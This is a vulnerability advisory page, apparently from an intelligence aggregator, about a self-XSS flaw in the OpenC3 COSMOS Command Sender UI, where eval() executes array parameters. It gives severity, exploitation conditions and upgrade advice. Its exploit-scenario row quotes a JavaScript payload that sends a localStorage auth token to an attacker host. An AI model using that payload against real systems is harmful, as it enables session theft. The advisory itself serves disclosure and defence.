EUVD-2026-27061Severity by source
AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
Lifecycle Timeline
5DescriptionGitHub Advisory
OpenC3 COSMOS provides the functionality needed to send commands to and receive data from one or more embedded systems. Prior to version 7.0.0, the Command Sender UI uses an unsafe eval() function on array-like command parameters, which allows a user-supplied payload to execute in the browser when sending a command. This creates a self-XSS risk because an attacker can trigger their own script execution in the victim’s session, if allowed to influence the array parameter input, for example via phishing. If successful, an attacker may read or modify data in the authenticated browser context, including session tokens in local storage. This issue has been patched in version 7.0.0.
AnalysisAI
Self-XSS in OpenC3 COSMOS Command Sender UI prior to version 7.0.0 allows authenticated users to execute arbitrary JavaScript in their own browser session via unsafe eval() processing of array parameters. An attacker can exploit this through phishing or by convincing a victim to send a malicious command, potentially stealing session tokens or modifying authenticated data. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires the following specific conditions: (1) The attacker must be able to influence the array parameter input in the Command Sender UI - typically via social engineering or phishing, since the COSMOS UI is accessed only by authenticated users; (2) The victim must be an authenticated user with an active session in COSMOS (PR:L from CVSS confirms authentication is required); (3) The victim must send a command containing the malicious array payload using the Command Sender UI's 'Send' button (UI:R confirms user interaction is required); (4) The target command must support ARRAY-type parameters - commands without array parameters are not vulnerable. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | This vulnerability presents moderate real-world risk despite the low CVSS score (4.6). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker crafts a phishing email or social engineering message targeting a COSMOS operator, requesting they send a specific command to test or troubleshoot a system issue. The attacker includes a malicious command with a payload like [alert('XSS')] or more dangerously [fetch('https://attacker.com/steal?token=' + localStorage.getItem('auth_token'))] embedded in the array parameter. … |
| Remediation | Upgrade OpenC3 COSMOS to version 7.0.0 or later immediately - this is the vendor-released patch that fixes the unsafe eval() usage in the Command Sender UI. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Share
External POC / Exploit Code
Leaving vuln.today